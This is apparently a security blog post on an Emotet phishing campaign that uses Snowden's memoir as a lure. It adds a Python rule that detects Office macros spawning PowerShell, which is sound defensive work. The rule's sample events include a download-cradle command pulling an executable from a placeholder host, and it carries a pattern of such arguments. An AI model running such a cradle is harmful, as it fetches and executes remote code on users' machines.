Emotet recently resumed spear phishing attacks, using the news about NSA whistleblower Edward Snowden’s new book Permanent Record as a lure. The memoir is already on Amazon’s bestseller list, and criminals routinely exploit such newsworthy events for scams and other social engineering. In this campaign, the Emotet operators purport to offer Snowden’s memoir as a Word attachment. Phishing emails from this campaign were found in English, Italian, Spanish, German and French, as shown below.
When the document is opened, a fake message appears claiming that “Word hasn’t been activated”. When the victim clicks “Enable Content” in the accompanying security warning, the malicious macro code executes.
The macro launches a PowerShell command that retrieves the Emotet binary from a compromised WordPress site. Once infected, the machine attempts to reach one of Emotet’s many C2 servers.
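The chain above (Word macro spawning PowerShell that fetches the payload) is exactly what a process-creation rule catches. The following Python is an added example and not code from the original post: it flags an Office parent process spawning a scripting host with download or encoded-command arguments, run over constructed Sysmon-style events (the file paths, command lines and the example.invalid URL are assumptions, not indicators from this campaign).

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process creation).
# These are illustrative only, not telemetry from the Emotet campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # "QQBBAEEA" is a constructed placeholder, not a real encoded command
     "CommandLine": "powershell -w hidden -enc QQBBAEEA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c powershell (New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/p','p.exe')"},
]

# Office applications that should not normally spawn a scripting host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Arguments typical of a download cradle or an obfuscated command line.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc\b|-encodedcommand|downloadfile|downloadstring|invoke-webrequest|"
    r"\biwr\b|bitsadmin|-w\s+hidden|-windowstyle\s+hidden)", re.I)


def basename(path):
    """Return the lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def is_macro_spawn(event):
    """True if an Office parent spawned a scripting host with suspicious args."""
    return (basename(event["ParentImage"]) in OFFICE_PARENTS
            and basename(event["Image"]) in SCRIPT_HOSTS
            and bool(SUSPICIOUS_ARGS.search(event["CommandLine"])))


def detect(events):
    """Return the parent image names of all events matching the rule."""
    return [basename(e["ParentImage"]) for e in events if is_macro_spawn(e)]


if __name__ == "__main__":
    for parent in detect(SAMPLE_EVENTS):
        print("ALERT: macro-style spawn from", parent)
```

The same logic maps directly onto a SIEM rule keyed on parent image, child image and command line; tune the argument pattern to your environment to keep legitimate scripted workflows from alerting.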